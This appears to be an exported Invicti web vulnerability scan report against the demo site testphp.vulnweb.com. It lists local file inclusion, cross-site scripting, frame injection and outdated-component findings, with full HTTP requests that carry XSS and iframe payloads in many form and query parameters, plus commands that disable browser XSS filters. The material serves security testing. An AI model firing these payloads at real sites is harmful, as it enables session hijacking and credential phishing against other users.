An issue was discovered in PHP 7.3.x before 7.3.0alpha3, 7.2.x before 7.2.8, and before 7.1.20. The php-fpm master process restarts a child process in an endless loop when using program execution functions (e.g., passthru, exec, shell_exec, or system) with a non-blocking STDIN stream, causing this master process to consume 100% of the CPU, and consume disk space with a large volume of error logs, as demonstrated by an attack by a customer of a shared-hosting facility.
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
GET / HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Invicti Standard identified a probable Local File Inclusion vulnerability, which occurs when a file from the target system is injected into the attacked server page.
Even though Invicti Standard believes there is a high possibility of a local file inclusion in here, it could not confirmit. There can be numerous reasons for Invicti Standard being unable to confirm it. We strongly recommend you investigate the issue manually to ensure it is a local file inclusion and needs to be addressed. You can also consider sending us the details of this issue so we can address it the next time and give you more precise results.
/etc/passwdfile/apache/logs/error.logor /apache/logs/access.log| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| GET | file | Querystring | data:;base64,TlM3NzU0NTYxNDQ2NTc1 |
| GET | size | Querystring | 160 |
GET /showimage.php?file=data%3a%3bbase64%2cTlM3NzU0NTYxNDQ2NTc1&size=160 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/search.php?test=query
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
| PCI DSS v3.2 | 6.5.8 |
|---|---|
| PCI DSS v4.0 | 6.2.4 |
| OWASP 2013 | A4 |
| OWASP 2017 | A5 |
| CWE | 22 |
| CAPEC | 252 |
| WASC | 33 |
| HIPAA | 164.306(a) |
| ASVS 4.0 | 5.3.9 |
| NIST SP 800-53 | SI-10 |
| DISA STIG | V-6164 |
| ISO27001 | A.14.2.5 |
| ISO27001 2022 | A.8.26 |
| ISO27001 2022 | A.8.27 |
| ISO27001 2022 | A.8.28 |
| OWASP Top Ten 2021 | A01 |
CVSS 3.0 SCORE | |
|---|---|
| Base | 8.6 (High) |
| Temporal | 8.6 (High) |
| Environmental | 8.6 (High) |
CVSS Vector String |
|---|
| CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N |
CVSS 3.1 SCORE | |
|---|---|
| Base | 8.6 (High) |
| Temporal | 8.6 (High) |
| Environmental | 8.6 (High) |
CVSS Vector String |
|---|
| CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N |
CVSS 4.0 Score | |
|---|---|
| 6.9 / Medium | |
| Exploitability | High |
| Complexity | High |
| Vulnerable system | Low |
| Subsequent system | Low |
| Exploitation | High |
| Security requirements | Medium |
CVSS Vector String |
|---|
| CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L |
Invicti Standard detected Cross-site Scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| POST | phpaction | Post | echo $_POST[comment]; |
| POST | comment | Post | |
| POST | Submit | Post | Submit |
| POST | name | Post | </title><scRipt>netsparker(0x005D06)</scRipt> |
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| POST | submit | Post | add message |
| POST | text | Post | <scRipt>netsparker(0x002188)</scRipt> |
| POST | name | Post | anonymous user |
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| POST | submit | Post | add message |
| POST | text | Post | |
| POST | name | Post | <scRipt>netsparker(0x00218A)</scRipt> |
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| GET | pp | Querystring | x" onmouseover=netsparker(0x003049) x=" |
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| GET | p | Querystring | <scRipt>netsparker(0x004FDC)</scRipt> |
| GET | pp | Querystring | 12 |
| GET | aaaa%2f | Querystring |
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| GET | p | Querystring | valid |
| GET | pp | Querystring | <scRipt>netsparker(0x004FDE)</scRipt> |
| GET | aaaa%2f | Querystring |
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| GET | artist | Querystring | <scRipt>netsparker(0x00437A)</scRipt> |
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| GET | cat | Querystring | <scRipt>netsparker(0x001FDA)</scRipt> |
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| POST | searchFor | Post | <scRipt>netsparker(0x001A9D)</scRipt> |
| POST | goButton | Post | go |
| POST | test | Querystring | query |
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| POST | uaddress | Post | |
| POST | signup | Post | signup |
| POST | uphone | Post | |
| POST | urname | Post | |
| POST | ucc | Post | |
| POST | uemail | Post | |
| POST | upass | Post | |
| POST | upass2 | Post | |
| POST | uuname | Post | <scRipt>netsparker(0x004C31)</scRipt> |
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| POST | uaddress | Post | 3 |
| POST | signup | Post | signup |
| POST | uphone | Post | 3 |
| POST | urname | Post | '"--></style></scRipt><scRipt>netsparker(0x004C9E)</scRipt> |
| POST | ucc | Post | 4916613944329494 |
| POST | uemail | Post | netsparker@example.com |
| POST | upass | Post | N3tsp@rker- |
| POST | upass2 | Post | N3tsp@rker- |
| POST | uuname | Post | Smith |
POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 207
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
uemail=netsparker%40example.com&uaddress=3&ucc=4916613944329494&upass2=N3tsp%40rker-&uuname=Smith&upass=N3tsp%40rker-&uphone=3&urname='"--></style></scRipt><scRipt>netsparker(0x004C9E)</scRipt>&signup=signup
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| POST | uaddress | Post | 3 |
| POST | signup | Post | signup |
| POST | uphone | Post | 3 |
| POST | urname | Post | Smith |
| POST | ucc | Post | 4916613944329494 |
| POST | uemail | Post | '"--></style></scRipt><scRipt>netsparker(0x004B2A)</scRipt> |
| POST | upass | Post | N3tsp@rker- |
| POST | upass2 | Post | N3tsp@rker- |
| POST | uuname | Post | Smith |
POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 188
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
uemail='"--></style></scRipt><scRipt>netsparker(0x004B2A)</scRipt>&uaddress=3&ucc=4916613944329494&upass2=N3tsp%40rker-&uuname=Smith&upass=N3tsp%40rker-&uphone=3&urname=Smith&signup=signup
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| POST | uaddress | Post | 3 |
| POST | signup | Post | signup |
| POST | uphone | Post | 3 |
| POST | urname | Post | Smith |
| POST | ucc | Post | '"--></style></scRipt><scRipt>netsparker(0x004B2D)</scRipt> |
| POST | uemail | Post | netsparker@example.com |
| POST | upass | Post | N3tsp@rker- |
| POST | upass2 | Post | N3tsp@rker- |
| POST | uuname | Post | Smith |
POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 196
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
uemail=netsparker%40example.com&uaddress=3&ucc='"--></style></scRipt><scRipt>netsparker(0x004B2D)</scRipt>&upass2=N3tsp%40rker-&uuname=Smith&upass=N3tsp%40rker-&uphone=3&urname=Smith&signup=signup
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| POST | uaddress | Post | 3 |
| POST | signup | Post | signup |
| POST | uphone | Post | '"--></style></scRipt><scRipt>netsparker(0x004C9B)</scRipt> |
| POST | urname | Post | Smith |
| POST | ucc | Post | 4916613944329494 |
| POST | uemail | Post | netsparker@example.com |
| POST | upass | Post | N3tsp@rker- |
| POST | upass2 | Post | N3tsp@rker- |
| POST | uuname | Post | Smith |
POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 211
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
uemail=netsparker%40example.com&uaddress=3&ucc=4916613944329494&upass2=N3tsp%40rker-&uuname=Smith&upass=N3tsp%40rker-&uphone='"--></style></scRipt><scRipt>netsparker(0x004C9B)</scRipt>&urname=Smith&signup=signup
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| POST | uaddress | Post | '"--></style></scRipt><scRipt>netsparker(0x004B27)</scRipt> |
| POST | signup | Post | signup |
| POST | uphone | Post | 3 |
| POST | urname | Post | Smith |
| POST | ucc | Post | 4916613944329494 |
| POST | uemail | Post | netsparker@example.com |
| POST | upass | Post | N3tsp@rker- |
| POST | upass2 | Post | N3tsp@rker- |
| POST | uuname | Post | Smith |
POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 211
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
uemail=netsparker%40example.com&uaddress='"--></style></scRipt><scRipt>netsparker(0x004B27)</scRipt>&ucc=4916613944329494&upass2=N3tsp%40rker-&uuname=Smith&upass=N3tsp%40rker-&uphone=3&urname=Smith&signup=signup
The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context. For example, if the output goes in to a JavaScript block within the HTML document, then output needs to be encoded accordingly. Encoding can get very complex, therefore it's strongly recommended to use an encoding library such as OWASP ESAPI and Microsoft Anti-cross-site scripting.
Additionally, you should implement a strong Content Security Policy (CSP) as a defense-in-depth measure if an XSS vulnerability is mistakenly introduced. Due to the complexity of XSS-Prevention and the lack of secure standard behavior in programming languages and frameworks, XSS vulnerabilities are still common in web applications.
CSP will act as a safeguard that can prevent an attacker from successfully exploiting Cross-site Scripting vulnerabilities in your website and is advised in any kind of application. Please make sure to scan your application again with Content Security Policy checks enabled after implementing CSP, in order to avoid common mistakes that can impact the effectiveness of your policy. There are a few pitfalls that can render your CSP policy useless and we highly recommend reading the resources linked in the reference section before you start to implement one.
Generated XSS exploit might not work due to browser XSS filtering. Please follow the guidelines below in order to disable XSS filtering for different browsers. Also note that;
Chrome
chrome.exe --args --disable-xss-auditorInternet Explorer
Firefox
about:configin the URL address bar.falseby double clicking the row.Safari
defaults write com.apple.Safari "com.apple.Safari.ContentPageGroupIdentifier.WebKit2XSSAuditorEnabled" -bool FALSEdefaults write com.apple.Safari "com.apple.Safari.ContentPageGroupIdentifier.WebKit2XSSAuditorEnabled" -bool TRUE| PCI DSS v3.2 | 6.5.7 |
|---|---|
| PCI DSS v4.0 | 6.2.4 |
| OWASP 2013 | A3 |
| OWASP 2017 | A7 |
| CWE | 79 |
| CAPEC | 19 |
| WASC | 8 |
| HIPAA | 164.308(a) |
| ASVS 4.0 | 5.3.3 |
| NIST SP 800-53 | SI-15 |
| DISA STIG | V-16811 |
| ISO27001 | A.14.2.5 |
| ISO27001 2022 | A.8.26 |
| ISO27001 2022 | A.8.27 |
| ISO27001 2022 | A.8.28 |
| OWASP Top Ten 2021 | A03 |
CVSS 3.0 SCORE | |
|---|---|
| Base | 7.4 (High) |
| Temporal | 7.4 (High) |
| Environmental | 7.4 (High) |
CVSS Vector String |
|---|
| CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N |
CVSS 3.1 SCORE | |
|---|---|
| Base | 7.4 (High) |
| Temporal | 7.4 (High) |
| Environmental | 7.4 (High) |
CVSS Vector String |
|---|
| CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N |
CVSS 4.0 Score | |
|---|---|
| 5.1 / Medium | |
| Exploitability | Medium |
| Complexity | High |
| Vulnerable system | Low |
| Subsequent system | Low |
| Exploitation | High |
| Security requirements | Medium |
CVSS Vector String |
|---|
| CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N |
Invicti Standard identified the target web site is using class.upload.php and detected that it is out of date.
class.upload.php in verot.net class.upload before 1.0.3 and 2.x before 2.0.4, as used in the K2 extension for Joomla! and other products, omits .phar from the set of dangerous file extensions.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
class.upload.php in verot.net class.upload through 1.0.3 and 2.x through 2.0.4, as used in the K2 extension for Joomla! and other products, omits .pht from the set of dangerous file extensions, a similar issue to CVE-2019-19576.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
GET / HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts;packages
Acunetix-Aspect-ScanID: d0351b4b-e62d-417e-82fb-a118ba627995
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Invicti Standard identified the target web site is using phpmailer and detected that it is out of date.
PHPMailer before 6.5.0 on Windows allows remote code execution if lang_path is untrusted data and has a UNC pathname.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
PHPMailer 6.4.1 and earlier contain a vulnerability that can result in untrusted code being called (if such code is injected into the host project's scope by other means). If the $patternselect parameter to validateAddress() is set to 'php' (the default, defined by PHPMailer::$validator), and the global namespace contains a function called php, it will be called in preference to the built-in validator of the same name. Mitigated in PHPMailer 6.5.0 by denying the use of simple strings as validator function names.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
PHPMailer 6.1.8 through 6.4.0 allows object injection through Phar Deserialization via addAttachment with a UNC pathname. NOTE: this is similar to CVE-2018-19296, but arose because 6.1.8 fixed a functionality problem in which UNC pathnames were always considered unreadable by PHPMailer, even in safe contexts. As an unintended side effect, this fix eliminated the code that blocked addAttachment exploitation.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
GET / HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts;packages
Acunetix-Aspect-ScanID: d0351b4b-e62d-417e-82fb-a118ba627995
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Invicti Standard identified the target web site is using phpunit and detected that it is out of date.
Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
GET / HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts;packages
Acunetix-Aspect-ScanID: d0351b4b-e62d-417e-82fb-a118ba627995
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Invicti Standard identified the target web site is using smarty and detected that it is out of date.
Smarty is a template engine for PHP, facilitating the separation of presentation (HTML/CSS) from application logic. Prior to versions 3.1.43 and 4.0.3, template authors could run restricted static php methods. Users should upgrade to version 3.1.43 or 4.0.3 to receive a patch.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Smarty is a template engine for PHP, facilitating the separation of presentation (HTML/CSS) from application logic. Prior to versions 3.1.42 and 4.0.2, template authors could run arbitrary PHP code by crafting a malicious math string. If a math string was passed through as user provided data to the math function, external users could run arbitrary PHP code by crafting a malicious math string. Users should upgrade to version 3.1.42 or 4.0.2 to receive a patch.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Smarty is a template engine for PHP, facilitating the separation of presentation (HTML/CSS) from application logic. Prior to versions 3.1.45 and 4.1.1, template authors could inject php code by choosing a malicious {block} name or {include} file name. Sites that cannot fully trust template authors should upgrade to versions 3.1.45 or 4.1.1 to receive a patch for this issue. There are currently no known workarounds.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
In Smarty before 3.1.47 and 4.x before 4.2.1, libs/plugins/function.mailto.php allows XSS. A web page that uses smarty_function_mailto, and that could be parameterized using GET or POST input parameters, could allow injection of JavaScript code by a user.
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Smarty is a template engine for PHP. In affected versions smarty did not properly escape javascript code. An attacker could exploit this vulnerability to execute arbitrary JavaScript code in the context of the user's browser session. This may lead to unauthorized access to sensitive user data, manipulation of the web application's behavior, or unauthorized actions performed on behalf of the user. Users are advised to upgrade to either version 3.1.48 or to 4.3.1 to resolve this issue. There are no known workarounds for this vulnerability.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
GET / HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts;packages
Acunetix-Aspect-ScanID: d0351b4b-e62d-417e-82fb-a118ba627995
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Invicti Standard identified you are using an out-of-date version of Nginx.
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
A security issue in nginx resolver was identified, which might allow an attacker who is able to forge UDP packets from the DNS server to cause 1-byte memory overwrite, resulting in worker process crash or potential other impact.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L
ALPACA is an application layer protocol content confusion attack, exploiting TLS servers implementing different protocols but using compatible certificates, such as multi-domain or wildcard certificates. A MiTM attacker having access to victim's traffic at the TCP/IP layer can redirect traffic from one subdomain to another, resulting in a valid TLS session. This breaks the authentication of TLS and cross-protocol attacks may be possible where the behavior of one protocol service may compromise the other at the application layer.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
GET / HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
Please upgrade your installation of Nginx to the latest stable version.
| PCI DSS v3.2 | 6.2 |
|---|---|
| PCI DSS v4.0 | 6.3.3 |
| OWASP 2013 | A9 |
| OWASP 2017 | A9 |
| CWE | 1035 , 937 |
| CAPEC | 310 |
| WASC | 13 |
| HIPAA | 164.308(a)(1)(i) |
| ASVS 4.0 | 1.14.3 |
| NIST SP 800-53 | CM-6 |
| DISA STIG | V-16836 |
| OWASP Proactive Controls | C1 |
| ISO27001 | A.14.1.2 |
| ISO27001 2022 | A.8.19 |
| OWASP Top Ten 2021 | A06 |
| OWASP API Top 10 2023 | API8 |
Invicti Standard detected that password data is being transmitted over HTTP.
GET /login.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
| PCI DSS v3.2 | 6.5.4 |
|---|---|
| PCI DSS v4.0 | 6.2.4 |
| OWASP 2013 | A6 |
| OWASP 2017 | A3 |
| CWE | 319 |
| CAPEC | 65 |
| WASC | 4 |
| ASVS 4.0 | 2.2.5 |
| NIST SP 800-53 | SC-8 |
| DISA STIG | V-16796 |
| ISO27001 | A.14.1.3 |
| ISO27001 2022 | A.8.5 |
| ISO27001 2022 | A.8.24 |
| ISO27001 2022 | A.8.27 |
| ISO27001 2022 | A.8.3 |
| OWASP Top Ten 2021 | A02 |
CVSS 3.0 SCORE | |
|---|---|
| Base | 5.7 (Medium) |
| Temporal | 5.7 (Medium) |
| Environmental | 5.7 (Medium) |
CVSS Vector String |
|---|
| CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N |
CVSS 3.1 SCORE | |
|---|---|
| Base | 5.7 (Medium) |
| Temporal | 5.7 (Medium) |
| Environmental | 5.7 (Medium) |
CVSS Vector String |
|---|
| CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N |
CVSS 4.0 Score | |
|---|---|
| 5.1 / Medium | |
| Exploitability | Medium |
| Complexity | High |
| Vulnerable system | Low |
| Subsequent system | Low |
| Exploitation | High |
| Security requirements | Medium |
CVSS Vector String |
|---|
| CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N |
Invicti Standard detected Possible Cross-site Scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.
Although Invicti Standard believes there is a cross-site scripting in here, it couldnot confirm it. We strongly recommend investigating the issue manually to ensure it is cross-site scripting and needs to be addressed.
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| GET | file | Querystring | '"--></style></scRipt><scRipt>netsparker(0x002932)</scRipt> |
| GET | size | Querystring | 160 |
GET /showimage.php?file='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x002932)%3C/scRipt%3E&size=160 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/search.php?test=query
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.71 Safari/537.36
This issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered / encoded. Output should be filtered / encoded according to the output format and location.
There are a number of pre-defined, well structured whitelist libraries available for many different environments. Good examples of these include OWASP Reform and Microsoft Anti-Cross-site Scripting libraries.
Additionally, you should implement a strong Content Security Policy (CSP) as a defense-in-depth measure if an XSS vulnerability is mistakenly introduced. Due to the complexity of XSS-Prevention and the lack of secure standard behavior in programming languages and frameworks, XSS vulnerabilities are still common in web applications.
CSP will act as a safeguard that can prevent an attacker from successfully exploiting Cross-site Scripting vulnerabilities in your website and is advised in any kind of application. Please make sure to scan your application again with Content Security Policy checks enabled after implementing CSP, in order to avoid common mistakes that can impact the effectiveness of your policy. There are a few pitfalls that can render your CSP policy useless and we highly recommend reading the resources linked in the reference section before you start to implement one.
| PCI DSS v3.2 | 6.5.7 |
|---|---|
| PCI DSS v4.0 | 6.2.4 |
| OWASP 2013 | A3 |
| OWASP 2017 | A7 |
| CWE | 79 |
| CAPEC | 19 |
| WASC | 8 |
| HIPAA | 164.308(a) |
| ASVS 4.0 | 5.3.3 |
| NIST SP 800-53 | SI-15 |
| DISA STIG | V-16811 |
| ISO27001 | A.14.2.5 |
| ISO27001 2022 | A.8.26 |
| ISO27001 2022 | A.8.27 |
| ISO27001 2022 | A.8.28 |
| OWASP Top Ten 2021 | A03 |
CVSS 3.0 SCORE | |
|---|---|
| Base | 7.4 (High) |
| Temporal | 7.4 (High) |
| Environmental | 7.4 (High) |
CVSS Vector String |
|---|
| CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N |
CVSS 3.1 SCORE | |
|---|---|
| Base | 7.4 (High) |
| Temporal | 7.4 (High) |
| Environmental | 7.4 (High) |
CVSS Vector String |
|---|
| CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N |
CVSS 4.0 Score | |
|---|---|
| 5.1 / Medium | |
| Exploitability | Medium |
| Complexity | High |
| Vulnerable system | Low |
| Subsequent system | Low |
| Exploitation | High |
| Security requirements | Medium |
CVSS Vector String |
|---|
| CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N |
Invicti Standard detected Frame Injection, which occurs when a frame on a vulnerable web page displays another web page via a user-controllable input.
An attacker might use this vulnerability to redirect users to other malicious websites that are used for phishing and similar attacks. Additionally they might place a fake login form in the frame, which can be used to steal credentials from your users.
It should be noted that attackers can also abuse injected frames in order to circumvent certain client side security mechanisms. Developers might overwrite functions to make it harder for attackers to abuse a vulnerability.
If an attacker uses a javascript: URL as src attribute of an iframe, the malicious JavaScript code is executed under the origin of the vulnerable website. However, it has access to a fresh window object without any overwritten functions.
| Method | Parameter | Parameter Type | Value |
|---|---|---|---|
| GET | p | Querystring | <iframe src="http://r87.com/?"></iframe> |
| GET | pp | Querystring | 12 |
| GET | aaaa%2f | Querystring |
GET /hpp/params.php?aaaa%2f=&p=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&pp=12 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
